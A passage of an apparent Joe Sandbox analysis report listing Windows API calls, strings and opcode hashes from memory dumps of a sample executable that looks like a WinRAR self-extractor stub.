    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: 090d788f10a3f0098e3d134751482fda1dd835c25fff719b8afc0d188d3679f2
    • Instruction ID: d412ef8844d4b99aac9be4cf5e683df23cce6061946809f5d502397ff4331859
    • Opcode Fuzzy Hash: 090d788f10a3f0098e3d134751482fda1dd835c25fff719b8afc0d188d3679f2
    • Instruction Fuzzy Hash: 03F06230A40208BBDF159FB4DC59FEEBFB4EF04711F018169F905A21A0CB345E40CA91
    APIs
      • Part of subcall function 00CA1B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CA1B4F
      • Part of subcall function 00CA1B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00CA0633,Crypt32.dll,00000000,00CA06AD,00000200,?,00CA0690,00000000,00000000,?), ref: 00CA1B71
    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CA063F
    • GetProcAddress.KERNEL32(00CDA1F0,CryptUnprotectMemory), ref: 00CA064F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: AddressProc$DirectoryLibraryLoadSystem
    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
    • API String ID: 2141747552-1753850145
    • Opcode ID: 62ba7d02e6bc3929f8fae2f096f48c74defe70d26ec7783671430944891f51fb
    • Instruction ID: f4c07f6dd8c4e498a0b143b1a1939c6a5079c13cd153459fb39a6d55700e0928
    • Opcode Fuzzy Hash: 62ba7d02e6bc3929f8fae2f096f48c74defe70d26ec7783671430944891f51fb
    • Instruction Fuzzy Hash: 8CE04F70845B825FD7245F74E828F467FE45B25719F14C82DF69593551D6B4E8408B10
    APIs
    Similarity
    • API ID: AdjustPointer$_abort
    • String ID:
    • API String ID: 2252061734-0
    • Opcode ID: a55305ba9c944b2dcc39bad1c1e045de9003408b5648b903a005a10aadf9b812
    • Instruction ID: f0a454ec05b08db49e6d98cb1d3d57e9e7e804133875a0c613d3587686a7304f
    • Opcode Fuzzy Hash: a55305ba9c944b2dcc39bad1c1e045de9003408b5648b903a005a10aadf9b812
    • Instruction Fuzzy Hash: 0651F771A046C6AFDB299F64D845BFAB7A4EF40310F14452EEC16872A1E731EF80DB90
    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 00CBD0E9
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CBD10C
      • Part of subcall function 00CBA7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00CBDBDC,00000000,?,00CB80A1,?,00000008,?,00CBA861,?,?,?), ref: 00CBA820
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CBD132
    • _free.LIBCMT ref: 00CBD145
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CBD154
    Similarity
    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
    • String ID:
    • API String ID: 336800556-0
    • Opcode ID: f61db97311bc6587d3a22abea7e284c9a0d3620f04590872aacfe35f0aeb7a5b
    • Instruction ID: 2426db681cc3625763713d1e49e2e5641f6e4ff16437b8e3fdccfa294ed730ef
    • Opcode Fuzzy Hash: f61db97311bc6587d3a22abea7e284c9a0d3620f04590872aacfe35f0aeb7a5b
    • Instruction Fuzzy Hash: AD01AC726012157F372116BBAC4CDBF6A6DDEC2BB1B180119F906D7200FE608D419970
    APIs
    • GetLastError.KERNEL32(?,00CD3070,00000200,00CBA7E0,00CB7586,?,?,?,?,00C9ECA4,?,02FC33A8,00000064,00000004,00C9EA30,?), ref: 00CBA58E
    • _free.LIBCMT ref: 00CBA5C3
    • _free.LIBCMT ref: 00CBA5EA
    • SetLastError.KERNEL32(00000000,00CC4ADC,00000050,00CD3070), ref: 00CBA5F7
    • SetLastError.KERNEL32(00000000,00CC4ADC,00000050,00CD3070), ref: 00CBA600
    Similarity
    • API ID: ErrorLast$_free
    • String ID:
    • API String ID: 3170660625-0
    • Opcode ID: 9508fdaa69d40c01f5def5f779705f09289c65810a8ad8aabe8b78dcfc0d9529
    • Instruction ID: b3927dd86589acd90e1ba02158999675544ca0f8755caa86affbbb97da18d0d2
    • Opcode Fuzzy Hash: 9508fdaa69d40c01f5def5f779705f09289c65810a8ad8aabe8b78dcfc0d9529
    • Instruction Fuzzy Hash: 69014472280A016787262735AD89FEF276E9BC0371F22002AF994D2141FE308F4A6022
    APIs
    • _free.LIBCMT ref: 00CBD9C7
      • Part of subcall function 00CBA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC), ref: 00CBA670
      • Part of subcall function 00CBA65A: GetLastError.KERNEL32(00CC4ADC,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC,00CC4ADC), ref: 00CBA682
    • _free.LIBCMT ref: 00CBD9D9
    • _free.LIBCMT ref: 00CBD9EB
    • _free.LIBCMT ref: 00CBD9FD
    • _free.LIBCMT ref: 00CBDA0F
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: bc0f8b2db8bf19b9097a92a3cddcf6852654a65647d6b3e74651e26f27ae8fc5
    • Instruction ID: cfa991adaa96a79dd5ad4bc77f238aeacf845829a85e27c4cc0dc1119539cf0d
    • Opcode Fuzzy Hash: bc0f8b2db8bf19b9097a92a3cddcf6852654a65647d6b3e74651e26f27ae8fc5
    • Instruction Fuzzy Hash: F8F0FF72505204AB8620EB68E5C6E9E77E9BB05711F680C07F09DE7901DB70FD809665
    APIs
    • _wcslen.LIBCMT ref: 00CA3330
    • _wcslen.LIBCMT ref: 00CA3341
    • _wcslen.LIBCMT ref: 00CA3351
    • _wcslen.LIBCMT ref: 00CA335F
    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00C9C844,?,?,00000000,?,?,?), ref: 00CA337A
    Similarity
    • API ID: _wcslen$CompareString
    • String ID:
    • API String ID: 3397213944-0
    • Opcode ID: 7f281c4a6438422cf0f8b8d885035e6932cd086aff3b4acecd76901edbf4bbff
    • Instruction ID: f59604ff7d89e6101fac0ea7a6195c8ab485a61c797ea7ef7893cd02d2bbfd20
    • Opcode Fuzzy Hash: 7f281c4a6438422cf0f8b8d885035e6932cd086aff3b4acecd76901edbf4bbff
    • Instruction Fuzzy Hash: D4F01D3214C154BFCF162F91DC09DDE3F26EB85B71B118415F6195B062CA71D652A690
    APIs
    • _free.LIBCMT ref: 00CB9CDE
      • Part of subcall function 00CBA65A: RtlFreeHeap.NTDLL(00000000,00000000,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC), ref: 00CBA670
      • Part of subcall function 00CBA65A: GetLastError.KERNEL32(00CC4ADC,?,00CBDA46,00CC4ADC,00000000,00CC4ADC,00000000,?,00CBDA6D,00CC4ADC,00000007,00CC4ADC,?,00CBDE6A,00CC4ADC,00CC4ADC), ref: 00CBA682
    • _free.LIBCMT ref: 00CB9CF0
    • _free.LIBCMT ref: 00CB9D03
    • _free.LIBCMT ref: 00CB9D14
    • _free.LIBCMT ref: 00CB9D25
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: c182de6542ef1d013c46ec91ea95212969b9e5c3111edc7ca9494c511bad08e0
    • Instruction ID: 153896d4f16e8dda62bb9d545e048819c5cbb07aa7d0a4337661665042a6c057
    • Opcode Fuzzy Hash: c182de6542ef1d013c46ec91ea95212969b9e5c3111edc7ca9494c511bad08e0
    • Instruction Fuzzy Hash: D1F05EB48029218FC7097F1CFC467AE3BA1F725722B260617F25992270C7711D41DB87
    APIs
      • Part of subcall function 00CAB699: GetDC.USER32(00000000), ref: 00CAB69D
      • Part of subcall function 00CAB699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CAB6A8
      • Part of subcall function 00CAB699: ReleaseDC.USER32(00000000,00000000), ref: 00CAB6B3
    • GetObjectW.GDI32(?,00000018,?), ref: 00CAB83C
      • Part of subcall function 00CABACE: GetDC.USER32(00000000), ref: 00CABAD7
      • Part of subcall function 00CABACE: GetObjectW.GDI32(?,00000018,?), ref: 00CABB06
      • Part of subcall function 00CABACE: ReleaseDC.USER32(00000000,?), ref: 00CABB9E
    Strings
    Similarity
    • API ID: ObjectRelease$CapsDevice
    • String ID: (
    • API String ID: 1061551593-3887548279
    • Opcode ID: 5967505a23012d8214b7f99bd02acb6c2d7a6513b5aeeb362b872d0a1a2f0a7f
    • Instruction ID: 9c259655f689079b6eca9616f582903581c002e5e9fb182945ffdc2e03abc65f
    • Opcode Fuzzy Hash: 5967505a23012d8214b7f99bd02acb6c2d7a6513b5aeeb362b872d0a1a2f0a7f
    • Instruction Fuzzy Hash: D991ED71608751AFD624DF65C858E2BBBE8FF89704F00891EF59AD3261DB30AC45CB62
    APIs
    Strings
    Similarity
    • API ID: _swprintf
    • String ID: %ls$%s: %s
    • API String ID: 589789837-2259941744
    • Opcode ID: 74c6cc81d451ff2b8ac3351635536f7bf308fabce7ddcfd12f96165fda62b5ec
    • Instruction ID: bf201210573204a3b23ff793f533c69805a8ea41a1c253056818a0ca975ebc12
    • Opcode Fuzzy Hash: 74c6cc81d451ff2b8ac3351635536f7bf308fabce7ddcfd12f96165fda62b5ec
    • Instruction Fuzzy Hash: 8E51D631288327FFEA212AAECC06F277259AB17F0DF104506B397A44E5C5E25552B72B
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\oJK2UKac7G.exe,00000104), ref: 00CB9360
    • _free.LIBCMT ref: 00CB942B
    • _free.LIBCMT ref: 00CB9435
    Strings
    Similarity
    • API ID: _free$FileModuleName
    • String ID: C:\Users\user\Desktop\oJK2UKac7G.exe
    • API String ID: 2506810119-1160765840
    • Opcode ID: cdd929888774cc73a16f85361595e3a6f6677d429265600186c4aa8e7a12b6dc
    • Instruction ID: 513a397cd2f95703bda376a6bc3eb1c42e8a906d60c6aeb11f9169ee94baf9f1
    • Opcode Fuzzy Hash: cdd929888774cc73a16f85361595e3a6f6677d429265600186c4aa8e7a12b6dc
    • Instruction Fuzzy Hash: F731AEB1A04218EFCB25DF99D881EEEBBFCEB85310F1040A6FA1497211D7708E41DB91
    APIs
    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CB437B
    • _abort.LIBCMT ref: 00CB4486
    Strings
    Similarity
    • API ID: EncodePointer_abort
    • String ID: MOC$RCC
    • API String ID: 948111806-2084237596
    • Opcode ID: 48d453d51a11059e03e020b0367d7a03a210c33fc951a9034d857a7c437bb4b2
    • Instruction ID: ebdb5b7316939984d1c4c11dad52d8992c60a9727a2ec3f5976575d45b7bea28
    • Opcode Fuzzy Hash: 48d453d51a11059e03e020b0367d7a03a210c33fc951a9034d857a7c437bb4b2
    • Instruction Fuzzy Hash: A1417971900249AFCF19DF98CC81AEEBBB5FF48300F188199F914A7222D335AA61DF50
    APIs
    • __EH_prolog.LIBCMT ref: 00C97F20
      • Part of subcall function 00C942F1: __EH_prolog.LIBCMT ref: 00C942F6
    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00C97FE5
      • Part of subcall function 00C98704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00C98713
      • Part of subcall function 00C98704: GetLastError.KERNEL32 ref: 00C98759
      • Part of subcall function 00C98704: CloseHandle.KERNEL32(?), ref: 00C98768
    Strings
    Similarity
    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
    • String ID: SeRestorePrivilege$SeSecurityPrivilege
    • API String ID: 3813983858-639343689
    • Opcode ID: 31f58aa1f987c1de3ea6b85d7a3bd7ccf8d2888214f089d2c7c09541ce6eee98
    • Instruction ID: 0f01948d04d8e2783a045dcf8f323769d9da8f5dc64076d3aba1af5879e76592
    • Opcode Fuzzy Hash: 31f58aa1f987c1de3ea6b85d7a3bd7ccf8d2888214f089d2c7c09541ce6eee98
    • Instruction Fuzzy Hash: 9B31E371A11284AEDF20EFA4DC09FFE7BA9EB05354F004026F515E7192CB749E49EB61
    APIs
      • Part of subcall function 00C912F6: GetParent.USER32(?), ref: 00C9132A
      • Part of subcall function 00C912F6: GetDlgItem.USER32(00000000,00003021), ref: 00C9133A
      • Part of subcall function 00C912F6: SetWindowTextW.USER32(00000000,00CC45F4), ref: 00C91350
    • EndDialog.USER32(?,00000001), ref: 00CABE58
    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00CABE6D
    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CABE82
    Strings
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: ASKNEXTVOL
    • API String ID: 364370097-3402441367
    • Opcode ID: 8e6dff1bcb7d3613dda1b3f25b41fee9a0be38d6abfd3dba1460691a968dedab
    • Instruction ID: b548ee72e3bd2f8cc17f5e45845f183b33ec442220a4de556bfe747e2bfbacac
    • Opcode Fuzzy Hash: 8e6dff1bcb7d3613dda1b3f25b41fee9a0be38d6abfd3dba1460691a968dedab
    • Instruction Fuzzy Hash: F511E232600612BFD6119FA8DD0AFBA3BA9EB4BB44F040014F740AB0A6C7629E11D766
    APIs
    • __fprintf_l.LIBCMT ref: 00C9EC74
    • _strncpy.LIBCMT ref: 00C9ECBA
      • Part of subcall function 00CA30E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00CD3070,00000200,00C9EC48,00000000,?,00000050,00CD3070), ref: 00CA3102
    Strings
    Similarity
    • API ID: ByteCharMultiWide__fprintf_l_strncpy
    • String ID: $%s$@%s
    • API String ID: 562999700-834177443
    • Opcode ID: 848b2c05bcbf74dc1758019388d502f322bfaccbb494df6f78df3c7cbc9b837d
    • Instruction ID: 4586d2587d727451f4f44e88cdea3a65752bcd9972e2b6fe72d841610c9fdd4c
    • Opcode Fuzzy Hash: 848b2c05bcbf74dc1758019388d502f322bfaccbb494df6f78df3c7cbc9b837d
    • Instruction Fuzzy Hash: 3521AF7254020CAEEF20EEA8CE49FEF3BA8AF25700F040526F961961A1E771D6549B51
    APIs
    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00C9C04A,00000008,?,00000000,?,00C9E685,?,00000000), ref: 00CA219E
    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00C9C04A,00000008,?,00000000,?,00C9E685,?,00000000), ref: 00CA21A8
    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00C9C04A,00000008,?,00000000,?,00C9E685,?,00000000), ref: 00CA21B8
    Strings
    • Thread pool initialization failed., xrefs: 00CA21D0
    Similarity
    • API ID: Create$CriticalEventInitializeSectionSemaphore
    • String ID: Thread pool initialization failed.
    • API String ID: 3340455307-2182114853
    • Opcode ID: ba18e8213a3fb27837e10f807be1c1ae889480530b65a2ae5d030843dd92349a
    • Instruction ID: cd80f9724d64c4c5663dc58bb5d7135c14123d0ff8b72cc0d5fd0ed5c8229ae7
    • Opcode Fuzzy Hash: ba18e8213a3fb27837e10f807be1c1ae889480530b65a2ae5d030843dd92349a
    • Instruction Fuzzy Hash: A61194B1644715AFC3215F7ADC84AABFBECEF55344F14482EF3D6C2200D6715A408B60
    APIs
      • Part of subcall function 00C912F6: GetParent.USER32(?), ref: 00C9132A
      • Part of subcall function 00C912F6: GetDlgItem.USER32(00000000,00003021), ref: 00C9133A
      • Part of subcall function 00C912F6: SetWindowTextW.USER32(00000000,00CC45F4), ref: 00C91350
    • EndDialog.USER32(?,00000001), ref: 00CAC49E
    • GetDlgItemTextW.USER32(?,00000066,?,00000200), ref: 00CAC4B6
    • SetDlgItemTextW.USER32(?,00000067,?), ref: 00CAC4E4
    Strings
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: GETPASSWORD1
    • API String ID: 364370097-3292211884
    • Opcode ID: f8a9fcf6c3b822b8bc66b159e6f172d73cb99fdeb07b6cdd5cf22f6e6ccfb39a
    • Instruction ID: e46635ea533051cb30d2d880249dc501c4c235eca1d91aadbdbf541f538c50ab
    • Opcode Fuzzy Hash: f8a9fcf6c3b822b8bc66b159e6f172d73cb99fdeb07b6cdd5cf22f6e6ccfb39a
    • Instruction Fuzzy Hash: 2911C472A0022ABADB215A649D99FFB3B7CEB0A758F114420FB15F6080C271AA019669
    Strings
    Similarity
    • API ID:
    • String ID: RENAMEDLG$REPLACEFILEDLG
    • API String ID: 0-56093855
    • Opcode ID: 0e98b8037ccb5542a411e8ac9623ac03efe684bd2f99047331fd6136ff5c611f
    • Instruction ID: b27d575a9080405d9f3fb96a93780246f1720e7733f60ffedd33ee9bed005aa6
    • Opcode Fuzzy Hash: 0e98b8037ccb5542a411e8ac9623ac03efe684bd2f99047331fd6136ff5c611f
    • Instruction Fuzzy Hash: 8C017171605246AFDB115F29EC48BAA3FA4AB06798F14002AF50693270C2719D50DBE2
    APIs
      • Part of subcall function 00C9F608: _swprintf.LIBCMT ref: 00C9F62E
      • Part of subcall function 00C9F608: _strlen.LIBCMT ref: 00C9F64F
      • Part of subcall function 00C9F608: SetDlgItemTextW.USER32(?,00CD0274,?), ref: 00C9F6AF
      • Part of subcall function 00C9F608: GetWindowRect.USER32(?,?), ref: 00C9F6E9
      • Part of subcall function 00C9F608: GetClientRect.USER32(?,?), ref: 00C9F6F5
    • GetParent.USER32(?), ref: 00C9132A
    • GetDlgItem.USER32(00000000,00003021), ref: 00C9133A
    • SetWindowTextW.USER32(00000000,00CC45F4), ref: 00C91350
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ItemRectTextWindow$ClientParent_strlen_swprintf
    • String ID: 0
    • API String ID: 1283792255-4108050209
    • Opcode ID: 115930cd3f691957fade3ac5787364f0b8e18cddff6e486ba4854d343e25455e
    • Instruction ID: 617c762a2dd449e7ebcc668628ed9aaf9b0ce222de9733288c0e6a919ace2b84
    • Opcode Fuzzy Hash: 115930cd3f691957fade3ac5787364f0b8e18cddff6e486ba4854d343e25455e
    • Instruction Fuzzy Hash: EDF03C70104689AADF155F61880FBBD3BA8BB05394F088128FE54949B1CB74DA91EA11
    APIs
    • std::_Xinvalid_argument.LIBCPMT ref: 00C9495C
      • Part of subcall function 00CAFD0D: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00CAFD19
      • Part of subcall function 00CAFD0D: ___delayLoadHelper2@8.DELAYIMP ref: 00CAFD3F
    • std::_Xinvalid_argument.LIBCPMT ref: 00C94967
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: Xinvalid_argumentstd::_$Helper2@8Load___delaystd::invalid_argument::invalid_argument
    • String ID: string too long$vector too long
    • API String ID: 2355824318-1617939282
    • Opcode ID: f3808f39dd2c5038ef3a133b088219afe37f1640bcfd95aa385e95cb904bc196
    • Instruction ID: 62e808d31c6495013dc6ec034d836a3b337f9e7a80c3af53f51b1627a7202a2b
    • Opcode Fuzzy Hash: f3808f39dd2c5038ef3a133b088219afe37f1640bcfd95aa385e95cb904bc196
    • Instruction Fuzzy Hash: 27F0A7312003046B4A28AF59EC49C4BB3EDEF85B58311052AF945C3705C7B0E90287B1
    APIs
    • LoadCursorW.USER32(00000000,00007F00), ref: 00CAAC4B
    • RegisterClassExW.USER32(00000030), ref: 00CAAC6C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: ClassCursorLoadRegister
    • String ID: 0$RarHtmlClassName
    • API String ID: 1693014935-3342523147
    • Opcode ID: 54d9cb7fe2386e5f4ee96056c803277215fc32aa7bb6ae976b59b126efa8f150
    • Instruction ID: 62dca41afcdace06f967e563da3b9be75d738487d6fcf123d3f08bd8ead7ea6a
    • Opcode Fuzzy Hash: 54d9cb7fe2386e5f4ee96056c803277215fc32aa7bb6ae976b59b126efa8f150
    • Instruction Fuzzy Hash: B8F0B2B1D11219ABDB009F99D988ADEFBB8FB08354F50802AE605B6240D7B55A048FA4
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: __alldvrm$_strrchr
    • String ID:
    • API String ID: 1036877536-0
    • Opcode ID: 838d351d10c979b051735ecdd2ea4a95940ff434e8fe6276b15dd9b2de709c18
    • Instruction ID: 43e51a00963827619eb60735f8cc12d5bffe51ab2e071e1bda9c801b2b44ea46
    • Opcode Fuzzy Hash: 838d351d10c979b051735ecdd2ea4a95940ff434e8fe6276b15dd9b2de709c18
    • Instruction Fuzzy Hash: 14A13472A007869FEB26CF28C8917EEBBE4EF55310F18416DE5E59B281D638CE41C752
    APIs
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00C98D5C,?,?,?), ref: 00C9B7F3
    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000800,?,00C98D5C,?,?), ref: 00C9B837
    • SetFileTime.KERNEL32(?,00C98AEC,?,00000000,?,00000800,?,00C98D5C,?,?,?,?,?,?,?,?), ref: 00C9B8B8
    • CloseHandle.KERNEL32(?,?,00000800,?,00C98D5C,?,?,?,?,?,?,?,?,?,?), ref: 00C9B8BF
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: File$Create$CloseHandleTime
    • String ID:
    • API String ID: 2287278272-0
    • Opcode ID: 8079a1e38f68fde8984793e51af1fcd236a0e1a4c4f8fa12789b8aa93e18b8bf
    • Instruction ID: b50824fc6d86816e0a9ea604817904a83815d91c3ddc132f02a3424cb7f7e6c0
    • Opcode Fuzzy Hash: 8079a1e38f68fde8984793e51af1fcd236a0e1a4c4f8fa12789b8aa93e18b8bf
    • Instruction Fuzzy Hash: E541D030188381AAEB21DE64ED59F9EBBE8ABC5700F04091DF5E1D71C0D764DE08DB62
    APIs
    Memory Dump Source
    • Source File: 00000000.00000002.2181656287.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
    • Associated: 00000000.00000002.2181643323.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181689944.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD0000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD3000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CD5000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181704847.0000000000CF4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.2181766337.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_c90000_oJK2UKac7G.jbxd
    Similarity
    • API ID: _wcslen
    • String ID:
    • API String ID: 176396367-0
    • Opcode ID: c454c9c9fff3a02e5b40f5747e31be68b2326e2a2538be577ed9c315d38bad32
    • Instruction ID: 23d7c81f4541154a14eded19e0ca957abb98f39929dcf5e3ea1da0e8e356ae7e
    • Opcode Fuzzy Hash: c454c9c9fff3a02e5b40f5747e31be68b2326e2a2538be577ed9c315d38bad32
    • Instruction Fuzzy Hash: 82419471A00A665BCB159FB88C59AEE7BB8EF05311F040029FE45F7245DB30AE498AE1
    APIs
    • _wcslen.LIBCMT ref: 00C98532
